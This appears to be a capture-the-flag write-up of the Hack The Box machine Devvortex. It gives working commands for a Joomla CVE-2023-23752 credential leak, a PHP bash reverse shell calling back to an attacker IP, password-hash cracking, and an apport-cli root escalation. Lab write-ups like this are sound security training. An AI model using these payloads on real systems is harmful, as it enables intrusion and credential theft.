🏴‍☠️HTB - Devvortex

p0db0t writeup of the easy-difficulty Linux machine Devvortex from https://hackthebox.eu

Enumeration Phase:

Nmap scan

First off, I started my enumeration with an Nmap scan of 10.10.11.242. The options I regularly use are: -sC is the equivalent to --script=default and runs a collection of Nmap enumeration scripts against the target, -sV does a service scan.

nmap -sC -sV 10.10.11.242

I added devvortex.htb to /etc/hosts next to the IP of the box which is 10.10.11.242

Since I still didn't have a way in, the next place to enumerate was HTTP on port 80. Navigating to http://devvortex.htb

Brute-force hidden directories:

After visiting http://devvortex.htb I decided to brute-force hidden directories with Gobuster and didn't find anything 😢

gobuster dir -u devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 200

Subdomain enumeration:

I used also gobuster for this host Subdomain enumeration and found dev.devvortex.htb

gobuster vhost -u devvortex.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

I added dev.devvortex.htb to /etc/hosts next to the IP of the box which is 10.10.11.242

After visiting http://dev.devvortex.htb

Brute-force hidden directories:

I decided to brute-force hidden directories with Dirsearch and find /administrator/ and /Readme.txt 🎉

dirsearch -u dev.devvortex.htb

On the Administrator page, I found out that is the login page of Joomla CMS.

On the Readme.txt page, I found out the version of Joomla CMS 4.2.

Initial Foothold:

I found out that Joomla CMS 4.2 is Vulnerable to CVE-2023-23752 and used the tool Curl to get some sensitive information including the Username and Password of user Lewis. About CVE-2023-23752 more on this link:https://nvd.nist.gov/vuln/detail/CVE-2023-23752

curl -v 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true'

After login on to the Administrator page with credentials that I found with Curl, I edited error.php which was located at /template/Cassiopeia/error.php and set up reverse shell script.

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.175/9001 0>&1'");
?>

I ran Netcat to listen to incoming connections and used Curl to trigger a reverse shell at the error.php page.

nc -lvnp 9001
curl http://dev.devvortex.htb/templates/cassiopeia/error.php

Boom! I got the shell as www-data

Owning User:

Credentials that I found with Curl have also a Database name so I went for MySQL checking.

mysql -u lewis -p
show databases;
use joomla
show tables;

select * from sd4fg_users;

Bingo 🎉 I found the hash of Lewis and saved the hash locally in a .txt file.

echo 'HASH' >> hash.txt

I cracked the hash of Logan using the tool John The Ripper

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --rules hash.txt

Sweet !!!! I log in as a user Logan via SSH.

ssh logan@devvortex.htb

Owning Root:

The sudo -l command gives me some interesting output

sudo -l

I found out that Apport-cli is Vulnerable to CVE-2023-1326 About CVE-2023-1326 more on this link: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023

sudo apport-cli -c /bin/mysql less
v
!
id